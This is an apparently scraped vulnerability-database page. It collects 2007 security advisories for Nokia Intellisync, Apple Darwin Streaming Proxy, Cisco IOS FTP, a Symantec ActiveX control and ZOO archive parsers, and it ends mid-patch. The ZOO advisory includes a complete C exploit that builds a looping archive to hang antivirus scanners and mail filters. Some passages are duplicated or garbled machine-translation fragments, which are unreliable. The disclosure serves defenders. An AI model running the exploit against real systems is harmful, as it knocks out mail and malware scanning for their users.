VARIoT IoT vulnerabilities database

usrmgr/userList.asp in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allows remote attackers to modify user account details and cause a denial of service (account deactivation) via the userid parameter in an update action. Intellisync Mobile Suite is prone to a denial-of-service vulnerability. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Nokia Intellisync Mobile Suite Multiple Vulnerabilities SECUNIA ADVISORY ID: SA25212 VERIFY ADVISORY: http://secunia.com/advisories/25212/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Exposure of system information, Exposure of sensitive information, DoS WHERE: >From remote SOFTWARE: Intellisync Mobile Suite http://secunia.com/product/3450/ DESCRIPTION: Johannes Greil has reported some vulnerabilities in Nokia's Intellisync Mobile Suite, which can be exploited by malicious people to gain knowledge of sensitive information, conduct cross-site scripting attacks, manipulate certain data, or cause a DoS (Denial of Service). 1) Missing authentication checks within certain ASP scripts (e.g. userList.asp, userStatusList.asp) can be exploited to modify or gain knowledge of certain user details, or to disable user accounts. 2) Certain input passed to de/pda/dev_logon.asp, usrmgr/registerAccount.asp, and de/create_account.asp is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 3) An error within the bundled Apache Tomcat server can be exploited to disclose directory listings and script source codes. The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and 6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless Email Express. Other versions may also be affected. SOLUTION: Upgrade to GMS 2. PROVIDED AND/OR DISCOVERED BY: Johannes Greil, SEC Consult ORIGINAL ADVISORY: http://www.sec-consult.com/289.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple stack-based buffer overflows in the is_command function in proxy.c in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allow remote attackers to execute arbitrary code via a long (1) cmd or (2) server value in an RTSP request. An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service. These issues affect versions prior to 5.5.5. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. SOLUTION: Update to version 5.5.5. http://developer.apple.com/opensource/server/streaming/index.html PROVIDED AND/OR DISCOVERED BY: An anonymous person, reported via iDefense Labs. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305495 iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . Apple Darwin Streaming Proxy Multiple Vulnerabilities iDefense Security Advisory 05.10.07 http://labs.idefense.com/intelligence/vulnerabilities/ May 10, 2007 I. BACKGROUND Darwin Streaming Server is a server technology that facilitates streaming of QuickTime data to clients across the Internet using the industry standard RTP and RTSP protocols. The Darwin Streaming Proxy is an application-specific proxy which would normally be run in a border zone or perimeter network. It is used to give client machines, within a protected network, access to streaming servers where the firewall blocks RTSP connections or RTP/UDP data flow. For more information, please visit the product website at via following URL. http://developer.apple.com/opensource/server/streaming/index.html II. Due to insufficient sanity checking, a stack-based buffer overflow could occur while trying to extract commands from the request buffer. The "is_command" function, located in proxy.c, lacks bounds checking when filling the 'cmd' and 'server' buffers. Additionally, a heap-based buffer overflow could occur while processing the "trackID" values contained within a "SETUP" request. If a request with more than 32 values is encountered, memory corruption will occur. III. No credentials are required for accessing the vulnerable code. The stack-based buffer overflow vulnerability relies on compiler optimizations. iDefense has verified the Darwin Streaming Proxy 4.1 binary release for Fedora Core is not vulnerable. The binary produced from a out-of-the-box compile on Fedora was confirmed vulnerable. IV. DETECTION iDefense has confirmed the existence of these vulnerabilities in Darwin Streaming Server 5.5.4 and Darwin Streaming Proxy 4.1. V. WORKAROUND Employ firewalls, access control lists or other TCP/UDP restriction mechanisms to limit access to vulnerable systems and services. VI. VENDOR RESPONSE Apple has addressed this vulnerability by releasing version 5.5.5 of Darwin Streaming Server. More information can be found from Apple's Security Update page or the Darwin Streaming Server advisory page at the respective URLs below. http://docs.info.apple.com/article.html?artnum=61798 http://docs.info.apple.com/article.html?artnum=305495 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0748 to the heap-based buffer overflow and CVE-2007-0749 to stack-based buffer overflow. These names are a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/09/2007 Initial vendor notification 04/09/2007 Initial vendor response 05/10/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Heap-based buffer overflow in Apple Darwin Streaming Proxy, when using Darwin Streaming Server before 5.5.5, allows remote attackers to execute arbitrary code via multiple trackID values in a SETUP RTSP request. An attacker can exploit these issues to execute arbitrary code with superuser privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial of service. These issues affect versions prior to 5.5.5. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. SOLUTION: Update to version 5.5.5. http://developer.apple.com/opensource/server/streaming/index.html PROVIDED AND/OR DISCOVERED BY: An anonymous person, reported via iDefense Labs. ORIGINAL ADVISORY: Apple: http://docs.info.apple.com/article.html?artnum=305495 iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=533 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . BACKGROUND Darwin Streaming Server is a server technology that facilitates streaming of QuickTime data to clients across the Internet using the industry standard RTP and RTSP protocols. The Darwin Streaming Proxy is an application-specific proxy which would normally be run in a border zone or perimeter network. It is used to give client machines, within a protected network, access to streaming servers where the firewall blocks RTSP connections or RTP/UDP data flow. For more information, please visit the product website at via following URL. http://developer.apple.com/opensource/server/streaming/index.html II. Due to insufficient sanity checking, a stack-based buffer overflow could occur while trying to extract commands from the request buffer. The "is_command" function, located in proxy.c, lacks bounds checking when filling the 'cmd' and 'server' buffers. Additionally, a heap-based buffer overflow could occur while processing the "trackID" values contained within a "SETUP" request. If a request with more than 32 values is encountered, memory corruption will occur. III. No credentials are required for accessing the vulnerable code. The stack-based buffer overflow vulnerability relies on compiler optimizations. iDefense has verified the Darwin Streaming Proxy 4.1 binary release for Fedora Core is not vulnerable. The binary produced from a out-of-the-box compile on Fedora was confirmed vulnerable. IV. V. WORKAROUND Employ firewalls, access control lists or other TCP/UDP restriction mechanisms to limit access to vulnerable systems and services. VI. More information can be found from Apple's Security Update page or the Darwin Streaming Server advisory page at the respective URLs below. http://docs.info.apple.com/article.html?artnum=61798 http://docs.info.apple.com/article.html?artnum=305495 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0748 to the heap-based buffer overflow and CVE-2007-0749 to stack-based buffer overflow. These names are a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 04/09/2007 Initial vendor notification 04/09/2007 Initial vendor response 05/10/2007 Coordinated public disclosure IX. CREDIT The discoverer of this vulnerability wishes to remain anonymous. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

The FTP Server in Cisco IOS 11.3 through 12.4 does not properly check user authorization, which allows remote attackers to execute arbitrary code, and have other impact including reading startup-config, as demonstrated by a crafted MKD command that involves access to a VTY device and overflows a buffer, aka bug ID CSCek55259. Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue. Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code. Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Cisco IOS FTP Server Multiple Vulnerabilities SECUNIA ADVISORY ID: SA25199 VERIFY ADVISORY: http://secunia.com/advisories/25199/ CRITICAL: Moderately critical IMPACT: Security Bypass, DoS, System access WHERE: >From remote OPERATING SYSTEM: Cisco IOS 12.x http://secunia.com/product/182/ Cisco IOS 11.x http://secunia.com/product/183/ DESCRIPTION: Some vulnerabilities have been reported in Cisco IOS, which can be exploited by malicious users and malicious people to bypass certain security restrictions, cause a DoS (Denial of Service), or potentially compromise a vulnerable system. 2) An unspecified error exists when transferring files via FTP, which can be exploited to cause a DoS (Denial of Service). Successful exploitation may allow an attacker to retrieve any file from an affected system (including startup-config), cause IOS to reload, and potentially execute arbitrary code, but requires that the FTP server is enabled, which is not the default setting. SOLUTION: The vendor has issued an update that removes the FTP server ability. As a workaround, it is possible to disable the FTP server by executing the following command in configuration mode: "no ftp-server enable". See vendor advisories for more details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple cross-site scripting (XSS) vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to de/pda/dev_logon.asp and (2) multiple unspecified vectors in (a) usrmgr/registerAccount.asp, (b) de/create_account.asp, and other files. (1) de/pda/dev_logon.asp To username Parameters (2) usrmgr/registerAccount.asp , de/create_account.asp Etc. Routes in unspecified files . Reports indicate that these issues reside only in the bundled package; Nokia Intellisync Mobile Suite may not be affected on its own. Successful attacks may allow an attacker to obtain sensitive information and carry out denial-of-service and cross-site scripting attacks. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. ---------------------------------------------------------------------- TITLE: Nokia Intellisync Mobile Suite Multiple Vulnerabilities SECUNIA ADVISORY ID: SA25212 VERIFY ADVISORY: http://secunia.com/advisories/25212/ CRITICAL: Moderately critical IMPACT: Cross Site Scripting, Exposure of system information, Exposure of sensitive information, DoS WHERE: >From remote SOFTWARE: Intellisync Mobile Suite http://secunia.com/product/3450/ DESCRIPTION: Johannes Greil has reported some vulnerabilities in Nokia's Intellisync Mobile Suite, which can be exploited by malicious people to gain knowledge of sensitive information, conduct cross-site scripting attacks, manipulate certain data, or cause a DoS (Denial of Service). 1) Missing authentication checks within certain ASP scripts (e.g. userList.asp, userStatusList.asp) can be exploited to modify or gain knowledge of certain user details, or to disable user accounts. 2) Certain input passed to de/pda/dev_logon.asp, usrmgr/registerAccount.asp, and de/create_account.asp is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. 3) An error within the bundled Apache Tomcat server can be exploited to disclose directory listings and script source codes. The vulnerabilities are reported in versions 6.4.31.2, 6.6.0.107, and 6.6.2.2 and is reported to partially affect Nokia Intellisync Wireless Email Express. Other versions may also be affected. SOLUTION: Upgrade to GMS 2. PROVIDED AND/OR DISCOVERED BY: Johannes Greil, SEC Consult ORIGINAL ADVISORY: http://www.sec-consult.com/289.html ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The Symantec NAVOPTS.DLL ActiveX control (aka Symantec.Norton.AntiVirus.NAVOptions) 12.2.0.13, as used in Norton AntiVirus, Internet Security, and System Works 2005 and 2006, is designed for use only in application-embedded web browsers, which allows remote attackers to "crash the control" via unspecified vectors related to content on a web site, and place Internet Explorer into a "defunct state" in which remote attackers can execute arbitrary code in addition to other Symantec ActiveX controls, regardless of whether they are marked safe for scripting. NOTE: this CVE was inadvertently used for an E-mail Auto-Protect issue, but that issue has been assigned CVE-2007-3771. (2) Internet Explorer The "defunc state" Regardless of the setting for whether scripting is safe or not. Symantec ActiveX An arbitrary code execution vulnerability exists with the control. This vulnerability E-mail Auto-Protect However, the problem is CVE-2007-3771 Has been assigned.A third party may be affected by: (1) " Crash control " There is a possibility that. (2) other Symantec ActiveX Arbitrary code, including controls, could be executed. An attacker may exploit this issue by enticing victims into opening a maliciously crafted HTML document. Successful exploits will allow attackers to execute arbitrary code in the context of the user visiting a malicious web page. Failed exploit attempts will likely result in denial-of-service conditions. Symantec Norton Internet Security 2006 COM Object Security ByPass Vulnerability iDefense Security Advisory 05.09.07 http://labs.idefense.com/intelligence/vulnerabilities/ May 09, 2007 I. BACKGROUND Norton Internet Security 2006 is a comprehensive system security suite that offers protection from spyware, viruses, identity theft, spam, and malicious network traffic. More information can be found on the vendors site at the following URL. http://www.symantec.com/home_homeoffice/products/overview.jsp?pcid=is&pvid=nis2006 II. When this control is loaded in a standard browser window, it throws an error during initialization which leaves the browser in a defunct state. After the error dialog displays, other Symantec ActiveX Controls can be created without error even if they are not marked as safe for scripting. This can lead to remote code execution if the unsafe controls contain exploitable methods. III. IV. DETECTION iDefense confirmed the existence of this vulnerability within version 12.2.0.13 of NavOpts.dll as distributed with Norton Internet Security 2006. Prior versions are suspected to be vulnerable. V. Although this will prevent potential exploitation, it may also negatively impact the functionality of the application. VI. VENDOR RESPONSE Symantec has addressed this vulnerability with a software update. The update is available via their LiveUpdate channels. For more information, consult their advisory at the following URL. http://www.symantec.com/avcenter/security/Content/2007.05.09.html VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-3456 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/13/2006 Initial vendor notification 12/13/2006 Initial vendor response 05/09/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Peter Vreugdenhil. Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright \xa9 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice@idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. This can be exploited to e.g. Set the kill-bit for the affected ActiveX control. PROVIDED AND/OR DISCOVERED BY: Discovered by Peter Vreugdenhil and reported via iDefense Labs. ORIGINAL ADVISORY: Symantec: http://www.symantec.com/avcenter/security/Content/2007.05.09.html iDefense Labs: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=529 ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

The IOS FTP Server in Cisco IOS 11.3 through 12.4 allows remote authenticated users to cause a denial of service (IOS reload) via unspecified vectors involving transferring files (aka bug ID CSCse29244). Cisco IOS FTP Server is prone to multiple vulnerabilities including a denial-of-service issue and an authentication-bypass issue. Attackers can exploit these issues to deny service to legitimate users, gain unauthorized access to an affected device, or execute arbitrary code. Only IOS devices that have the FTP Server feature enabled are vulnerable; this feature is disabled by default. Cisco IOS is the operating system used by Cisco networking equipment. ---------------------------------------------------------------------- Try a new way to discover vulnerabilities that ALREADY EXIST in your IT infrastructure. Join the FREE BETA test of the Network Software Inspector (NSI)! http://secunia.com/network_software_inspector/ The NSI enables you to INSPECT, DISCOVER, and DOCUMENT vulnerabilities in more than 4,000 different Windows applications. 1) An unspecified error exists in the IOS FTP server when verifying user credentials, which can be exploited to bypass user authentication. Successful exploitation may allow an attacker to retrieve any file from an affected system (including startup-config), cause IOS to reload, and potentially execute arbitrary code, but requires that the FTP server is enabled, which is not the default setting. SOLUTION: The vendor has issued an update that removes the FTP server ability. As a workaround, it is possible to disable the FTP server by executing the following command in configuration mode: "no ftp-server enable". See vendor advisories for more details. PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: http://www.cisco.com/en/US/products/products_applied_intelligence_response09186a00808399ea.html http://www.cisco.com/en/US/products/products_security_advisory09186a00808399d0.shtml ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

unzoo.c, as used in multiple products including AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. Topic: Multiple vendors ZOO file decompression infinite loop DoS Announced: 2007-05-04 Credits: Jean-Sebastien Guay-Leroux Products: Multiple (see section III) Impact: DoS (99% CPU utilisation) CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673 I. BACKGROUND Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension. II. The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. Those structures are linked between themselves with a 'next' pointer. This pointer is in fact an offset from the beginning of the file, representing the next direntry structure. By specifying an already processed file, it's possible to process more than one time this same file. The ZOO parser will then enter an infinite loop condition. III. AFFECTED SOFTWARES o Barracuda Spam Firewall o Panda Software Antivirus o avast! antivirus o Avira AntiVir o zoo-2.10 o unzoo.c o WinAce o PicoZip IV. IMPACT If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests. If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server. V. SOLUTION o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007. o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007. o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007. o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22th 2007. o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software. o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software. o WinAce was contacted but no response was received from them. o PicoZip was contacted but no response was received from them. VI. PROOF OF CONCEPT Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability. Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed. /* Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS coded by Jean-S\xe9bastien Guay-Leroux September 2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Structure of a ZOO header #define ZOO_HEADER_SIZE 0x0000002a #define ZH_TEXT 0 #define ZH_TAG 20 #define ZH_START_OFFSET 24 #define ZH_NEG_START_OFFSET 28 #define ZH_MAJ_VER 32 #define ZH_MIN_VER 33 #define ZH_ARC_HTYPE 34 #define ZH_ARC_COMMENT 35 #define ZH_ARC_COMMENT_LENGTH 39 #define ZH_VERSION_DATA 41 #define D_DIRENTRY_LENGTH 56 #define D_TAG 0 #define D_TYPE 4 #define D_PACKING_METHOD 5 #define D_NEXT_ENTRY 6 #define D_OFFSET 10 #define D_DATE 14 #define D_TIME 16 #define D_FILE_CRC 18 #define D_ORIGINAL_SIZE 20 #define D_SIZE_NOW 24 #define D_MAJ_VER 28 #define D_MIN_VER 29 #define D_DELETED 30 #define D_FILE_STRUCT 31 #define D_COMMENT_OFFSET 32 #define D_COMMENT_SIZE 36 #define D_FILENAME 38 #define D_VAR_DIR_LEN 51 #define D_TIMEZONE 53 #define D_DIR_CRC 54 #define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 ) #define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 ) #define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 ) void put_byte (char *ptr, unsigned char data) { *ptr = data; } void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); } void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); } FILE * open_file (char *filename) { FILE *fp; fp = fopen ( filename , "w" ); if (!fp) { perror ("Cant open file"); exit (1); } return fp; } void usage (char *progname) { printf ("\nTo use:\n"); printf ("%s <archive name>\n\n", progname); exit (1); } int main (int argc, char *argv[]) { FILE *fp; char *hdr = (char *) malloc (4096); char *filename = (char *) malloc (256); int written_bytes; int total_size; if ( argc != 2) { usage ( argv[0] ); } strncpy (filename, argv[1], 255); if (!hdr || !filename) { perror ("Error allocating memory"); exit (1); } memset (hdr, 0x00, 4096); // Build a ZOO header memcpy (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18); put_longword (hdr + ZH_TAG, 0xfdc4a7dc); put_longword (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE); put_longword (hdr + ZH_NEG_START_OFFSET, (ZOO_HEADER_SIZE) * -1); put_byte (hdr + ZH_MAJ_VER, 2); put_byte (hdr + ZH_MIN_VER, 0); put_byte (hdr + ZH_ARC_HTYPE, 1); put_longword (hdr + ZH_ARC_COMMENT, 0); put_word (hdr + ZH_ARC_COMMENT_LENGTH, 0); put_byte (hdr + ZH_VERSION_DATA, 3); // Build vulnerable direntry struct put_longword (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc); put_byte (hdr + ZOO_HEADER_SIZE + D_TYPE, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a); put_longword (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71); put_word (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394); put_word (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650); put_word (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1); put_byte (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_DELETED, 0); put_byte (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0); put_longword (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0); put_word (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0); memcpy (hdr + ZOO_HEADER_SIZE + D_FILENAME, "AAAAAAAA.AAA", 13); total_size = ZOO_HEADER_SIZE + 51; fp = open_file (filename); if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) { printf ("The file has been written\n"); } else { printf ("Cant write to the file\n"); exit (1); } fclose (fp); return 0; } VII. PATCH To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems: diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; /* directory entry */ int first_dir = 1; /* first dir entry seen? */ +unsigned long zoo_pointer = 0; /* Track our position in the file */ static char extract_ver[] = "Zoo %d.%d is needed to extract 